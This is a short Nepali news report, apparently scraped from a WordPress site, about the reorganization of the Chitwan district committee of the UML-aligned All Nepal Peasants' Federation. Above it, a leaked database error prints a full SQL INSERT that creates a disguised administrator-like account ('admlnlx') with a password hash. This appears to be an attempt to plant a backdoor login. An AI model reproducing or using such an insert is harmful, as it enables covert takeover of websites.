WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVCM5Sp/TDR1uMdx9Dm8R/xjbeX72Z1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 07:04:22', '', 'admlnlx', 'admlnlx')
चितवन, माघ ७–
नेकपा (एमाले) निकट अखिल नेपाल किसान महासंघ जिल्ला समिति चितवन पुनर्गठन गरिएको छ । शुक्रबार पार्टी कार्यालय भरतपुर मदननगरमा आयोजित भेलाले कृष्णप्रसाद सापकोटाको अध्यक्षतामा १७ सदस्यीय नयाँ कार्यसमिति गठन गरेको हो ।
नवगठित समितिको उपाध्यक्षमा दुर्वासा ओली, सचिवमा मदन घिमिरे, सहसचिवमा तिलक अधिकारी र कोषाध्यक्षमा भवानीकुमारी पाठक चयन भएका छन् ।
भेलाको महासंघका सहअध्यक्ष केशवलाल श्रेष्ठले उद्घाटन गरे । श्रेष्ठले किसानका समस्या समाधान गर्न महासंघ सधैं लडिरहने बताए । सो अवसरमा किसान महासंघका उपाध्यक्ष एवं महासंघका ३ नंं प्रदेश प्रमुख हरि पराजुली, नेकपा एमाले वैकल्पिक केन्द्रीय सदस्य कृष्णप्रसाद खनाल, एमाले जिल्ला अध्यक्ष कृष्णभक्त पोखरेल, केन्द्रीय सल्लाहकार समिति सदस्य देवी ज्ञवाली, महासंघका केन्द्रीय सदस्यहरु रामजी सापकोटा, शम्भु लामिछाने लगायतले बोलेका थिए । भेला विष्णुहरि देवकोटाको अध्यक्षतामा सम्पन्न भएको थियो ।